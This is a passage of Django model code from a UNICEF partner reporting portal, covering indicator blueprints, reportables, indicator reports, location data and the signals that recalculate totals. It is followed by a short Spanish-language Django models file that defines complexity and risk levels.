self.calculation_formula_across_periods not in unit_to_valid_calc_values.get(self.unit, []) or \\\n                self.calculation_formula_across_locations not in unit_to_valid_calc_values.get(self.unit, []):\n            raise serializers.ValidationError('Calculation methods not supported 
by selected unit')\n\n unit_to_valid_display_type_values = {\n self.NUMBER: map(lambda x: x[0], self.QUANTITY_DISPLAY_TYPE_CHOICES),\n self.PERCENTAGE: map(lambda x: x[0], self.RATIO_DISPLAY_TYPE_CHOICES),\n }\n if self.display_type not in unit_to_valid_display_type_values.get(self.unit, [\n ]):\n raise serializers.ValidationError('Display type is not supported by selected unit')\n\n def __str__(self):\n return self.title\n\n class Meta:\n ordering = ['-id']\n unique_together = TimeStampedExternalSourceModel.Meta.unique_together\n\n\n@receiver(post_save,\n sender=IndicatorBlueprint,\n dispatch_uid=\"trigger_indicator_report_recalculation\")\ndef trigger_indicator_report_recalculation(sender, instance, **kwargs):\n \"\"\"\n Whenever an indicator blueprint is saved, IndicatorReport objects\n linked to this IndicatorBlueprint via its Reportable should all be\n recalculated for its total.\n \"\"\"\n irs = IndicatorReport.objects.filter(reportable__in=instance.reportables.all())\n\n if instance.unit == IndicatorBlueprint.NUMBER:\n for ir in irs:\n QuantityIndicatorDisaggregator.calculate_indicator_report_total(ir)\n\n elif instance.unit == IndicatorBlueprint.PERCENTAGE:\n for ir in irs:\n RatioIndicatorDisaggregator.calculate_indicator_report_total(ir)\n\n\nclass Reportable(TimeStampedExternalSourceModel):\n \"\"\"\n Reportable / Applied Indicator model.\n\n related models:\n ContentType (ForeignKey): \"content_type\"\n content_type & object_id fields (GenericForeignKey): \"content_object\"\n partner.PartnerProject (ForeignKey): \"project\"\n indicator.IndicatorBlueprint (ForeignKey): \"blueprint\"\n cluster.ClusterObjective (ForeignKey): \"content_object\"\n self (ForeignKey): \"parent_indicator\"\n \"\"\"\n target = models.JSONField(\n default=default_value,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n baseline = models.JSONField(\n default=default_value,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n in_need = models.JSONField(\n blank=True, null=True,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n assumptions = models.TextField(null=True, blank=True)\n means_of_verification = models.CharField(max_length=255, null=True, blank=True)\n comments = models.TextField(max_length=4048, blank=True, null=True)\n measurement_specifications = models.TextField(max_length=4048, blank=True, null=True)\n label = models.TextField(max_length=4048, blank=True, null=True)\n numerator_label = models.CharField(max_length=256, blank=True, null=True)\n denominator_label = models.CharField(max_length=256, blank=True, null=True)\n start_date_of_reporting_period = models.DateField(blank=True, null=True)\n\n is_cluster_indicator = models.BooleanField(default=False)\n is_unicef_hf_indicator = models.BooleanField(default=False)\n\n contributes_to_partner = models.BooleanField(default=False)\n\n # Current total, transactional and dynamically calculated based on\n # IndicatorReports\n total = models.JSONField(default=default_total, validators=[JSONSchemaValidator(json_schema=indicator_schema)])\n\n # unique code for this indicator within the current context\n # eg: (1.1) result code 1 - indicator code 1\n context_code = models.CharField(\n max_length=50, null=True, blank=True, verbose_name=\"Code in current context\"\n )\n\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n # One of ClusterObjective, ClusterActivity, PartnerProject, PartnerActivity\n content_object = 
GenericForeignKey('content_type', 'object_id')\n blueprint = models.ForeignKey(\n IndicatorBlueprint,\n related_name=\"reportables\",\n on_delete=models.CASCADE,\n null=True,\n )\n parent_indicator = models.ForeignKey(\n 'self',\n related_name='children',\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n db_index=True,\n )\n locations = models.ManyToManyField(\n 'core.Location',\n related_name=\"reportables\",\n through=\"ReportableLocationGoal\"\n )\n\n frequency = models.CharField(\n max_length=3,\n choices=REPORTABLE_FREQUENCY_LEVEL,\n default=REPORTABLE_FREQUENCY_LEVEL.monthly,\n verbose_name='Frequency of reporting'\n )\n\n cs_dates = ArrayField(\n models.DateField(), default=list, null=True, blank=True\n )\n location_admin_refs = ArrayField(\n models.JSONField(), default=list, null=True, blank=True\n )\n disaggregations = models.ManyToManyField(Disaggregation, blank=True)\n\n active = models.BooleanField(default=True)\n\n ca_indicator_used_by_reporting_entity = models.ForeignKey(\n 'self',\n related_name='ca_indicators_re',\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n db_index=True\n )\n\n class Meta:\n ordering = ['-id']\n\n @property\n def ref_num(self):\n \"\"\"reference_number of the PD\"\"\"\n from etools_prp.apps.unicef.models import LowerLevelOutput\n\n if isinstance(self.content_object, LowerLevelOutput):\n return self.content_object.cp_output.programme_document.reference_number\n else:\n return ''\n\n @property\n def pd_id(self):\n \"\"\"reference_number of the PD\"\"\"\n from etools_prp.apps.unicef.models import LowerLevelOutput\n\n if isinstance(self.content_object, LowerLevelOutput):\n return self.content_object.cp_output.programme_document.id\n else:\n return ''\n\n @property\n def achieved(self):\n return self.total\n\n @property\n def calculated_target(self):\n if not self.target['v']:\n return 0.0\n\n if self.blueprint.unit == IndicatorBlueprint.NUMBER:\n return convert_string_number_to_float(self.target['v'])\n else:\n return convert_string_number_to_float(self.target['v']) / convert_string_number_to_float(self.target['d'])\n\n @property\n def calculated_baseline(self):\n if not self.baseline['v']:\n return 0.0\n\n if self.blueprint.unit == IndicatorBlueprint.NUMBER:\n return convert_string_number_to_float(self.baseline['v'])\n else:\n return convert_string_number_to_float(self.baseline['v']) / convert_string_number_to_float(self.baseline['d'])\n\n @property\n def calculated_in_need(self):\n if not self.in_need or self.in_need['v'] == \"\":\n return None\n\n if self.blueprint.unit == IndicatorBlueprint.NUMBER:\n return convert_string_number_to_float(self.in_need['v'])\n else:\n return convert_string_number_to_float(self.in_need['v']) / convert_string_number_to_float(self.in_need['d'])\n\n @property\n def progress_percentage(self):\n percentage = 0.0\n\n if self.achieved and self.baseline['v'] is not None and self.target['v'] is not None:\n baseline = convert_string_number_to_float(self.calculated_baseline)\n target = convert_string_number_to_float(self.calculated_target)\n\n dividend = 0 # default progress is 0\n if self.achieved['c'] > baseline:\n dividend = self.achieved['c'] - baseline\n divisor = convert_string_number_to_float(target) - baseline\n if divisor:\n percentage = round(dividend / divisor, 2)\n return percentage\n\n @classmethod\n def get_narrative_and_assessment(cls, progress_report_id):\n progress_report = IndicatorReport.objects.filter(\n progress_report_id=progress_report_id).first()\n return {\n 'overall_status': 
progress_report and progress_report.overall_status,\n 'narrative_assessment': progress_report and progress_report.narrative_assessment,\n }\n\n def __str__(self):\n return \"Reportable #{} {} on {}\".format(\n self.id, self.blueprint and self.blueprint.title, self.content_object\n )\n\n\ndef get_reportable_data_to_clone(instance):\n \"\"\"\n get_reportable_data_to_clone returns a map of field name and its value\n to clone a new Reportable instance\n\n Arguments:\n instance {indicator.models.Reportable} -- Reportable model instance\n \"\"\"\n return {\n 'active': instance.active,\n 'assumptions': instance.assumptions,\n 'baseline': instance.baseline,\n 'context_code': instance.context_code,\n 'created': instance.created,\n 'cs_dates': instance.cs_dates,\n 'external_id': instance.external_id,\n 'frequency': instance.frequency,\n 'in_need': instance.in_need,\n 'is_cluster_indicator': instance.is_cluster_indicator,\n 'location_admin_refs': instance.location_admin_refs,\n 'means_of_verification': instance.means_of_verification,\n 'modified': instance.modified,\n 'target': instance.target,\n 'comments': instance.comments,\n 'measurement_specifications': instance.measurement_specifications,\n 'start_date_of_reporting_period': instance.start_date_of_reporting_period,\n 'label': instance.label,\n 'numerator_label': instance.numerator_label,\n 'denominator_label': instance.denominator_label,\n }\n\n\ndef create_reportable_for_pa_from_ca_reportable(pa, ca_reportable):\n \"\"\"\n Copies one CA reportable instance to a partner activity.\n\n Arguments:\n pa {partner.models.PartnerActivity} -- PartnerActivity to copy to\n reportable {indicator.models.Reportable} -- ClusterActivity Reportable\n\n Raises:\n ValidationError -- Django Exception\n \"\"\"\n\n if ca_reportable.content_object != pa.cluster_activity:\n raise serializers.ValidationError(\"The Parent-child relationship is not valid\")\n\n reportable_data_to_sync = get_reportable_data_to_clone(ca_reportable)\n reportable_data_to_sync['total'] = dict([('c', 0), ('d', 1), ('v', 0)])\n reportable_data_to_sync[\"blueprint\"] = ca_reportable.blueprint\n reportable_data_to_sync[\"parent_indicator\"] = ca_reportable\n\n for project_context in pa.partneractivityprojectcontext_set.all():\n reportable_data_to_sync[\"content_object\"] = project_context\n pa_reportable = Reportable.objects.create(**reportable_data_to_sync)\n pa_reportable.disaggregations.add(*ca_reportable.disaggregations.all())\n\n\ndef create_reportable_for_papc_from_ca_reportable(papc, ca_reportable):\n \"\"\"\n Copies one CA reportable instance to a partner activity project context.\n\n Arguments:\n papc {partner.models.PartnerActivityProjectContext} -- PartnerActivityProjectContext to copy to\n reportable {indicator.models.Reportable} -- ClusterActivity Reportable\n\n Raises:\n ValidationError -- Django Exception\n \"\"\"\n\n if ca_reportable.content_object != papc.activity.cluster_activity:\n raise serializers.ValidationError(\"The Parent-child relationship is not valid\")\n\n reportable_data_to_sync = get_reportable_data_to_clone(ca_reportable)\n reportable_data_to_sync['total'] = dict([('c', 0), ('d', 1), ('v', 0)])\n reportable_data_to_sync[\"blueprint\"] = ca_reportable.blueprint\n reportable_data_to_sync[\"parent_indicator\"] = ca_reportable\n\n reportable_data_to_sync[\"content_object\"] = papc\n pa_reportable = Reportable.objects.create(**reportable_data_to_sync)\n pa_reportable.disaggregations.add(*ca_reportable.disaggregations.all())\n\n\ndef 
create_reportable_for_pp_from_ca_reportable(pp, ca_reportable):\n \"\"\"\n Copies one CA reportable instance to a partner activity.\n\n Arguments:\n pp {partner.models.PartnerProject} -- PartnerProject to copy to\n reportable {indicator.models.Reportable} -- ClusterActivity Reportable\n\n Raises:\n ValidationError -- Django Exception\n \"\"\"\n\n reportable_data_to_sync = get_reportable_data_to_clone(ca_reportable)\n reportable_data_to_sync['total'] = dict([('c', 0), ('d', 1), ('v', 0)])\n reportable_data_to_sync[\"content_object\"] = pp\n reportable_data_to_sync[\"blueprint\"] = ca_reportable.blueprint\n reportable_data_to_sync[\"parent_indicator\"] = ca_reportable\n pp_reportable = Reportable.objects.create(**reportable_data_to_sync)\n\n pp_reportable.disaggregations.add(*ca_reportable.disaggregations.all())\n\n return pp_reportable\n\n\ndef create_reportable_for_pp_from_co_reportable(pp, co_reportable):\n \"\"\"\n Copies one CO reportable instance to a partner project.\n\n Arguments:\n pp {partner.models.PartnerProject} -- PartnerProject to copy to\n co_reportable {indicator.models.Reportable} -- ClusterObjective Reportable\n\n Raises:\n ValidationError -- Django Exception\n\n Returns:\n Reportable -- PartnerProject type Reportable ORM instance\n \"\"\"\n\n # TODO: Add Cluster objective to have only one PartnerProject for a Partner\n reportable_data_to_sync = get_reportable_data_to_clone(co_reportable)\n reportable_data_to_sync['total'] = dict([('c', 0), ('d', 1), ('v', 0)])\n reportable_data_to_sync[\"content_object\"] = pp\n reportable_data_to_sync[\"blueprint\"] = co_reportable.blueprint\n reportable_data_to_sync[\"parent_indicator\"] = None\n pp_reportable = Reportable.objects.create(**reportable_data_to_sync)\n\n pp_reportable.disaggregations.add(*co_reportable.disaggregations.all())\n\n return pp_reportable\n\n\ndef create_pa_reportables_from_ca(pa, ca):\n \"\"\"\n Creates a set of PartnerActivity Reportable instances from\n ClusterActivity instance to target PartnerActivity instance\n\n Arguments:\n pa {partner.models.PartnerActivity} -- Target PartnerActivity instance\n ca {cluster.models.ClusterActivity} -- ClusterActivity to copy from\n \"\"\"\n\n if Reportable.objects.filter(partner_activity_project_contexts__activity=pa).count() > 0:\n return\n\n for reportable in ca.reportables.all():\n create_reportable_for_pa_from_ca_reportable(pa, reportable)\n\n\ndef create_papc_reportables_from_ca(papc, ca):\n \"\"\"\n Creates a set of PartnerActivityProjectContext Reportable instances from\n ClusterActivity instance to target PartnerActivityProjectContext instance\n\n Arguments:\n papc {partner.models.PartnerActivityProjectContext} -- Target PartnerActivityProjectContext instance\n ca {cluster.models.ClusterActivity} -- ClusterActivity to copy from\n \"\"\"\n\n if Reportable.objects.filter(partner_activity_project_contexts=papc).count() > 0:\n return\n\n for reportable in ca.reportables.all():\n create_reportable_for_papc_from_ca_reportable(papc, reportable)\n\n\ndef create_pa_reportables_for_new_ca_reportable(instance):\n \"\"\"\n Useful when creating a new CA reportable to create\n a set of PartnerActivity Reportable instances.\n\n Arguments:\n instance {indicator.models.Reportable} -- Cluster Activity Reportable to copy from\n \"\"\"\n for pa in instance.content_object.partner_activities.all():\n create_reportable_for_pa_from_ca_reportable(pa, instance)\n\n\ndef sync_ca_reportable_update_to_pa_reportables(instance, created):\n \"\"\"\n Whenever a Cluster Activity Reportable is 
created or is updated,\n clone_ca_reportable_to_pa handles a Reportable instance data to\n its Cluster Activity's Partner Activity instances.\n\n Under create flag, Partner Activity will get a new Reportable instance\n from Cluster Activity Reportable instance.\n\n Otherwise, update each cloned Reportable instance\n from its Cluster Activity's Partner Activity instances.\n\n Arguments:\n instance {indicator.models.Reportable} -- Reportable model instance\n created {boolean} -- created flag from Django post_save signal\n \"\"\"\n\n if instance.content_type.model == \"clusteractivity\":\n reportable_data_to_sync = get_reportable_data_to_clone(instance)\n\n if not created:\n # Update PA Reportable instances first\n instance.children.update(**reportable_data_to_sync)\n\n # Grab LLO Reportable instances that have CAI ID reference\n llo_reportables = Reportable.objects.filter(\n ca_indicator_used_by_reporting_entity=instance,\n lower_level_outputs__isnull=False\n )\n\n # Update these LLO Reportable instances except parent_indicator info\n if llo_reportables.exists():\n reportable_data_to_sync['blueprint'] = instance.blueprint\n llo_reportables.update(**reportable_data_to_sync)\n\n\n@receiver(post_save,\n sender=Reportable,\n dispatch_uid=\"clone_ca_reportable_to_pa\")\ndef clone_ca_reportable_to_pa_signal(sender, instance, created, **kwargs):\n sync_ca_reportable_update_to_pa_reportables(instance, created)\n\n\nclass ReportableLocationGoal(TimeStampedModel):\n reportable = models.ForeignKey(Reportable, on_delete=models.CASCADE)\n location = models.ForeignKey(\"core.Location\", on_delete=models.CASCADE)\n target = models.JSONField(\n default=default_value,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n baseline = models.JSONField(\n default=default_value,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n in_need = models.JSONField(\n blank=True, null=True,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n is_active = models.BooleanField(default=True)\n\n class Meta:\n unique_together = ('reportable', 'location')\n\n\nclass IndicatorReportManager(models.Manager):\n def active_reports(self):\n return self.objects.filter(\n report_status=INDICATOR_REPORT_STATUS.accepted)\n\n\nclass IndicatorReport(TimeStampedModel):\n \"\"\"\n IndicatorReport module is a result of partner staff activity (what they\n did in defined frequency scope).\n\n related models:\n indicator.Reportable (ForeignKey): \"indicator\"\n unicef.ProgressReport (ForeignKey): \"progress_report\"\n core.Location (OneToOneField): \"location\"\n indicator.ReportingEntity (ForeignKey): \"reporting_entity\"\n \"\"\"\n title = models.CharField(max_length=2048)\n reportable = models.ForeignKey(\n Reportable,\n related_name=\"indicator_reports\",\n on_delete=models.CASCADE,\n )\n progress_report = models.ForeignKey(\n 'unicef.ProgressReport',\n related_name=\"indicator_reports\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n )\n time_period_start = models.DateField() # first day of defined frequency mode\n time_period_end = models.DateField() # last day of defined frequency mode\n due_date = models.DateField() # can be few days/weeks out of the \"end date\"\n submission_date = models.DateField(null=True,\n blank=True,\n verbose_name=\"Date of submission\")\n frequency = models.CharField(\n max_length=3,\n choices=FREQUENCY_LEVEL,\n default=FREQUENCY_LEVEL.monthly,\n verbose_name='Frequency of reporting'\n )\n\n total = models.JSONField(\n default=default_total,\n 
validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n\n remarks = models.TextField(blank=True, null=True)\n report_status = models.CharField(\n choices=INDICATOR_REPORT_STATUS,\n default=INDICATOR_REPORT_STATUS.due,\n max_length=3\n )\n\n overall_status = models.CharField(\n choices=OVERALL_STATUS,\n default=OVERALL_STATUS.no_status,\n max_length=3\n )\n narrative_assessment = models.TextField(null=True, blank=True)\n\n review_date = models.DateField(verbose_name='Review Date',\n blank=True,\n null=True)\n sent_back_feedback = models.TextField(blank=True, null=True)\n\n parent = models.ForeignKey(\n 'self',\n related_name='children',\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n db_index=True,\n )\n\n reporting_entity = models.ForeignKey(\n 'indicator.ReportingEntity',\n related_name=\"indicator_reports\",\n on_delete=models.CASCADE,\n )\n\n project = models.ForeignKey(\n 'partner.PartnerProject',\n related_name=\"indicator_reports\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n )\n\n tracker = FieldTracker(fields=['report_status'])\n objects = IndicatorReportManager()\n\n class Meta:\n ordering = ['-due_date', '-id']\n # TODO: Enable this\n # unique_together = ('reportable', 'time_period_start', 'time_period_end')\n\n def __str__(self):\n return self.title\n\n def get_overall_status_display(self):\n if self.progress_report and self.progress_report.is_final and self.overall_status in FINAL_OVERALL_STATUS:\n return dict(FINAL_OVERALL_STATUS).get(self.overall_status)\n else:\n # This is one of the \"magical\" django methods and cannot be called directly using super call\n field_object = self._meta.get_field('overall_status')\n return self._get_FIELD_display(field_object)\n\n @property\n def is_complete(self):\n for location_disaggregation in IndicatorLocationData.objects.filter(indicator_report=self):\n if not location_disaggregation.is_complete:\n return False\n return True\n\n @property\n def is_draft(self):\n if self.submission_date is None and IndicatorLocationData.objects.filter(indicator_report=self).exists():\n return True\n return False\n\n @property\n def is_percentage(self):\n return self.display_type == self.reportable.blueprint.PERCENTAGE\n\n @property\n def is_number(self):\n return self.display_type == self.reportable.blueprint.NUMBER\n\n @property\n def can_import(self):\n if self.submission_date and self.report_status in [\n INDICATOR_REPORT_STATUS.accepted,\n INDICATOR_REPORT_STATUS.submitted]:\n return False\n return True\n\n @property\n def can_submit(self):\n if self.submission_date is not None and self.report_status == INDICATOR_REPORT_STATUS.sent_back:\n pass # lets go and check throw disaggregation\n elif self.submission_date and self.report_status in [\n INDICATOR_REPORT_STATUS.accepted,\n INDICATOR_REPORT_STATUS.submitted]:\n return False\n\n for data in self.indicator_location_data.all():\n if not data.is_complete:\n return False\n\n return True\n\n @property\n def progress_report_status(self):\n if self.progress_report:\n return self.progress_report.status\n else:\n return PROGRESS_REPORT_STATUS.due\n\n @property\n def status(self):\n # TODO: Check all disaggregation data across locations and return\n # status\n return 'fulfilled'\n\n @cached_property\n def disaggregations(self):\n return self.reportable.disaggregations.all()\n\n @cached_property\n def display_type(self):\n return self.reportable.blueprint.display_type\n\n @cached_property\n def display_time_period(self):\n return '{} - {}'.format(\n 
self.time_period_start.strftime(settings.PRINT_DATA_FORMAT),\n self.time_period_end.strftime(settings.PRINT_DATA_FORMAT),\n )\n\n @cached_property\n def calculation_formula_across_periods(self):\n return self.reportable.blueprint.calculation_formula_across_periods\n\n @cached_property\n def calculation_formula_across_locations(self):\n return self.reportable.blueprint.calculation_formula_across_locations\n\n def disaggregation_values(self, id_only=False, filter_by_id__in=None,\n flat=False):\n output_list = []\n\n disaggregations = self.disaggregations\n\n if filter_by_id__in:\n disaggregations = disaggregations.filter(id__in=filter_by_id__in)\n\n for disaggregation in disaggregations:\n if not id_only:\n disaggregation_value = disaggregation.disaggregation_values.order_by(\n 'id').values_list('id', 'value')\n\n else:\n disaggregation_value = disaggregation.disaggregation_values.order_by(\n 'id').values_list('id', flat=True)\n\n output_list.append(list(disaggregation_value))\n\n if flat:\n output_list = set(\n reduce(\n lambda acc,\n curr: acc + curr,\n output_list))\n\n return output_list\n\n\n@receiver(post_save, sender=IndicatorReport)\ndef send_notification_on_status_change(sender, instance, **kwargs):\n if instance.tracker.has_changed('report_status') and not getattr(instance, 'report_status_synced_from_pr', False):\n subject_template_path = 'emails/on_indicator_report_status_change_subject.txt'\n\n if instance.report_status == INDICATOR_REPORT_STATUS.sent_back:\n body_template_path = 'emails/on_indicator_report_status_change_sent_back_cluster.html'\n elif instance.report_status == INDICATOR_REPORT_STATUS.submitted:\n body_template_path = 'emails/on_indicator_report_status_change_submitted_cluster.html'\n else:\n return\n\n content_object = instance.reportable.content_object\n content_type_model = instance.reportable.content_type.model\n\n if content_type_model == 'clusterobjective':\n cluster = content_object.cluster\n indicator_type = 'cluster_objective'\n elif content_type_model == 'clusteractivity':\n cluster = content_object.cluster_objective.cluster\n indicator_type = 'cluster_activity'\n elif content_type_model == 'partneractivityprojectcontext' and content_object.activity.cluster_activity:\n cluster = content_object.activity.cluster_activity.cluster_objective.cluster\n indicator_type = 'partner_activity'\n else:\n cluster = None\n indicator_type = ''\n\n if cluster:\n cluster_imos = [role.user for role in cluster.old_prp_roles.filter(role=PRP_ROLE_TYPES.cluster_imo)]\n workspace_code = cluster.response_plan.workspace.workspace_code\n\n url_part = f'/app/{workspace_code}/cluster-reporting/plan/{cluster.response_plan_id}/results/draft'\n q_params = f'?indicator_type={indicator_type}&cluster_id={cluster.id}&indicator={instance.reportable_id}'\n ir_url = urljoin(settings.FRONTEND_HOST, url_part) + q_params\n\n template_data = {\n 'user': None,\n 'ir_url': ir_url,\n 'status': instance.get_report_status_display()\n }\n\n for user in cluster_imos:\n template_data['user'] = user\n to_email_list = [user.email]\n\n send_email_from_template(\n subject_template_path=subject_template_path,\n body_template_path=body_template_path,\n template_data=template_data,\n to_email_list=to_email_list,\n content_subtype='html',\n )\n\n\n@receiver(post_save,\n sender=IndicatorReport,\n dispatch_uid=\"unlock_ild_for_sent_back_cluster_ir\")\ndef unlock_ild_for_sent_back_cluster_ir(sender, instance, **kwargs):\n \"\"\"\n Whenever a Cluster indicator report is saved and found to be\n Sent back state then 
trigger unlock IndicatorLocationData instances.\n \"\"\"\n if instance.report_status != INDICATOR_REPORT_STATUS.sent_back \\\n and not isinstance(instance.reportable.content_object, PartnerActivity):\n return\n\n with transaction.atomic():\n instance.indicator_location_data.all().update(is_locked=False)\n\n child_irs = instance.children.values_list('id', flat=True)\n IndicatorLocationData.objects.filter(indicator_report__in=child_irs).update(is_locked=False)\n\n\n@receiver(post_save,\n sender=IndicatorReport,\n dispatch_uid=\"recalculate_reportable_total\")\ndef recalculate_reportable_total(sender, instance, **kwargs):\n \"\"\"\n Whenever an indicator report is saved and found to be Accepted or in\n Sent back state then trigger a recalculation fo the Reportable total.\n \"\"\"\n if instance.report_status != INDICATOR_REPORT_STATUS.accepted and \\\n instance.report_status != INDICATOR_REPORT_STATUS.sent_back:\n return\n\n reportable = instance.reportable\n blueprint = reportable.blueprint\n\n if instance.progress_report:\n # Only Accepted indicator reports for QPR progress report should be used.\n accepted_indicator_reports = IndicatorReport.objects.filter(\n reportable=reportable,\n report_status=INDICATOR_REPORT_STATUS.accepted,\n progress_report__report_type=REPORTING_TYPES.QPR,\n )\n else:\n # Only accepted indicator reports should be used.\n accepted_indicator_reports = reportable.indicator_reports.all().filter(\n report_status=INDICATOR_REPORT_STATUS.accepted)\n\n # Reset the reportable total\n reportable_total = {\n 'c': 0,\n 'd': 0,\n 'v': 0,\n }\n\n if accepted_indicator_reports.count() > 0:\n # If unit choice is NUMBER then have to handle sum, avg, max\n if blueprint.unit == IndicatorBlueprint.NUMBER:\n reportable_total['d'] = 1\n\n if blueprint.calculation_formula_across_periods == IndicatorBlueprint.MAX:\n max_total_ir = max(\n accepted_indicator_reports,\n key=lambda item: item.total['v'])\n reportable_total = max_total_ir.total\n elif blueprint.calculation_formula_across_periods == IndicatorBlueprint.LATEST:\n reportable_total = accepted_indicator_reports.order_by('-time_period_start').first().total\n else: # if its SUM or avg then add data up\n for indicator_report in accepted_indicator_reports:\n reportable_total['v'] += indicator_report.total['v']\n\n if blueprint.calculation_formula_across_periods == IndicatorBlueprint.AVG:\n ir_count = accepted_indicator_reports.count()\n if ir_count > 0:\n reportable_total['v'] = reportable_total['v'] / \\\n (ir_count * 1.0)\n\n reportable_total['c'] = reportable_total['v']\n\n elif blueprint.unit == IndicatorBlueprint.PERCENTAGE:\n latest_accepted_indicator_report = accepted_indicator_reports.order_by('-time_period_start').first()\n\n reportable_total['v'] = latest_accepted_indicator_report.total['v']\n reportable_total['d'] = latest_accepted_indicator_report.total['d']\n\n if reportable_total['d'] != 0:\n reportable_total['c'] = (reportable_total['v'] / (reportable_total['d'] * 1.0))\n\n if blueprint.display_type == IndicatorBlueprint.PERCENTAGE:\n reportable_total['c'] *= 100\n\n reportable.total = reportable_total\n reportable.save()\n\n # Triggering total recalculation on parent Reportable from its children\n if reportable.parent_indicator:\n new_parent_total = {\n 'c': 0,\n 'd': 1,\n 'v': 0,\n }\n child_totals = reportable.parent_indicator.children.values_list('total', flat=True)\n\n for total in child_totals:\n new_parent_total['v'] += total['v']\n new_parent_total['d'] += total['d']\n\n if 
reportable.parent_indicator.blueprint.unit == IndicatorBlueprint.NUMBER:\n new_parent_total['d'] = 1\n new_parent_total['c'] = new_parent_total['v']\n\n else:\n new_parent_total['c'] = new_parent_total['v'] / (new_parent_total['d'] * 1.0)\n\n if reportable.parent_indicator.blueprint.display_type == IndicatorBlueprint.PERCENTAGE:\n new_parent_total['c'] *= 100\n\n reportable.parent_indicator.total = new_parent_total\n reportable.parent_indicator.save()\n\n\nclass ReportingEntity(TimeStampedModel):\n \"\"\"\n ReportingEntity module it includes an organization entity for\n Cluster Activity indicator that is adopted from ProgrammeDocument\n \"\"\"\n title = models.CharField(max_length=256, unique=True)\n\n class Meta:\n ordering = ['id']\n verbose_name_plural = 'Reporting entities'\n\n def __str__(self):\n return \"Reporting entity: {}\".format(self.title)\n\n\ndef default_disaggregation():\n return {'()': {'c': 0, 'd': 0, 'v': 0}}\n\n\nclass IndicatorLocationData(TimeStampedModel):\n \"\"\"\n IndicatorLocationData module it includes indicators for chosen location.\n\n related models:\n indicator.IndicatorReport (ForeignKey): \"indicator_report\"\n core.Location (OneToOneField): \"location\"\n \"\"\"\n indicator_report = models.ForeignKey(\n IndicatorReport,\n related_name=\"indicator_location_data\",\n on_delete=models.CASCADE,\n )\n location = models.ForeignKey(\n 'core.Location',\n related_name=\"indicator_location_data\",\n on_delete=models.CASCADE,\n )\n\n disaggregation = models.JSONField(\n default=default_disaggregation,\n validators=[JSONSchemaValidator(json_schema=disaggregation_schema)]\n )\n num_disaggregation = models.IntegerField()\n level_reported = models.IntegerField()\n disaggregation_reported_on = ArrayField(models.IntegerField(), default=list)\n percentage_allocated = models.DecimalField(\n decimal_places=2,\n help_text='Entered data value allocation by %',\n max_digits=5,\n default=1.0000,\n )\n is_locked = models.BooleanField(default=False)\n\n class Meta:\n ordering = ['id']\n verbose_name_plural = 'Indicator location data'\n # TODO: enable\n # unique_together = ('indicator_report', 'location')\n\n def __str__(self):\n return \"{} Location Data for {}\".format(self.location, self.indicator_report)\n\n @cached_property\n def is_complete(self):\n \"\"\"\n Returns if this indicator location data has had some data entered for\n it, and is complete.\n \"\"\"\n # When changing this remember to adjust same method for indicator_report\n return self.modified != self.created\n\n @cached_property\n def previous_location_data(self):\n previous_indicator_reports = self.indicator_report.reportable.indicator_reports.exclude(\n id=self.indicator_report.id\n ).filter(time_period_start__lt=self.indicator_report.time_period_start)\n\n previous_report = previous_indicator_reports.order_by('-time_period_start').first()\n if previous_report:\n return previous_report.indicator_location_data.filter(location=self.location).first()\n\n @cached_property\n def previous_location_progress_value(self):\n if not self.previous_location_data:\n return 0\n\n total_disaggregation = self.previous_location_data.disaggregation.get('()', {})\n if self.indicator_report.is_percentage:\n return total_disaggregation.get(ValueType.CALCULATED, 0)\n else:\n return total_disaggregation.get(ValueType.VALUE, 
0)\n","repo_name":"unicef/etools-partner-reporting-portal","sub_path":"django_api/etools_prp/apps/indicator/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":41856,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
+{"seq_id":"36292649767","text":"from django.db import models\n\n\n# Create your models here.\nclass ComplejidadRiesgo(models.Model):\n \"\"\"docstring for ComplejidadRiesgo\"\"\"\n def __init__(self, *args, **kwargs):\n super(ComplejidadRiesgo, self).__init__(*args, **kwargs)\n\n situacion = models.CharField(max_length=100, unique=True)\n descripcion = models.TextField()\n factor_complejidad = models.IntegerField()\n factor_riesgo = models.IntegerField()\n\n def __str__(self):\n return self.situacion\n\n class Meta:\n verbose_name = \"Complejidad y riesgo\"\n verbose_name_plural = \"Complejidades y riesgos\"\n ordering = [\"situacion\"]\n\n\nclass NivelComplejidadRiesgo(models.Model):\n \"\"\"docstring for NivelComplejidadRiesgo\"\"\"\n def __init__(self, *args, **kwargs):\n super(NivelComplejidadRiesgo, self).__init__(*args, **kwargs)\n\n nivel_complejidad_riesgo = models.CharField(max_length=25, unique=True)\n factor_inicial = models.IntegerField()\n factor_final = models.IntegerField()\n porcentaje = models.DecimalField(max_digits=7, decimal_places=2)\n\n def __str__(self):\n return self.nivel_complejidad_riesgo\n\n class Meta:\n verbose_name = \"Nivel de complejidad y riesgo\"\n verbose_name_plural = \"niveles de complejidades y riesgos\"\n ordering = [\"nivel_complejidad_riesgo\"]\n","repo_name":"yusnelvy/mtvmcotizacionv02","sub_path":"complejidadriesgo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
